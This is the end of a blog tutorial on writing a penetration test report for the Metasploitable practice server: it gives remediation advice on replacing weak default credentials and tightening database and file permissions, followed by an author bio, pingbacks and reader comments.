All the weak credentials should be replaced with strong credentials:

- the system users: postgres, user, msfadmin, service, klog, sys.
- the root user of the MySQL database server.
- the postgres user of the PostgreSQL database server.
- the tomcat user of the tomcat deploy manager.
- the msfadmin private key into the home directory of the “user” user.

The web applications should use proper filesystem access control lists instead of being world readable. Also, an unprivileged user should be configured for database access, instead of using MySQL’s root user.

It is recommended to avoid installing a compiler on production machines.

Article written by

Marius is the man with the idea behind Hack a Server, a platform designed for conducting manual penetration tests using the power of crowdsourcing, covered by anonymity and confidentiality. He considers himself a serial entrepreneur and is very passionate about Artificial Intelligence.

8 responses to “HowTo: Penetration test report example [Metasploitable]”

  1. Training Arena

    [...] Except Metasploitable, all the systems/targets that you will find into Training Arena, are built and deployed by users like you and not by the Hack a Server Team. We uploaded Metasploitable to help our users better understand HowTo: Penetration test report example [Metasploitable] [...]

  2. sandeep

    Hey Admin,

    Have a Question. ” How can we Block Port scanning of our linux Server” ?

    U can send me answer on my email id [ sandeep.singh748@gmail.com ] .

    Thanks .

    1. coder.tux
  3. Getting HaS Certificate – Proof that you are a PenTester

    [...] more insights please read our tutorials on HowTo: Complete a penetration test report and HowTo: Penetration test report example [Metasploitable] var dd_offset_from_content = 40; var dd_top_offset_from_content = [...]

  4. Writing a Penetration Testing Report: sample template and guidelines | Night Lion Security Blog

    [...] HowTo: Penetration test report example  (function() {var s = document.createElement('SCRIPT'), s1 = document.getElementsByTagName('SCRIPT')[0];s.type = 'text/javascript';s.async = true;s.src = 'http://widgets.digg.com/buttons.js';s1.parentNode.insertBefore(s, s1);})(); // [...]

  5. Writing a Penetration Testing Report: sample template and guidelines

    [...] HowTo: Penetration test report example  (function() {var s = document.createElement('SCRIPT'), s1 = document.getElementsByTagName('SCRIPT')[0];s.type = 'text/javascript';s.async = true;s.src = 'http://widgets.digg.com/buttons.js';s1.parentNode.insertBefore(s, s1);})(); // [...]

  6. shooter free flashgames

    Hi, Neat post. There’s an issue together with your web site in web explorer, would
    test this? IE nonetheless is the marketplace chief and a good section of people will omit your excellent writing because of this problem.

  7. Krypsys

    Penetration testing is a very effective way of viewing where your weaknesses lie giving you an indication where to improve

Leave a Reply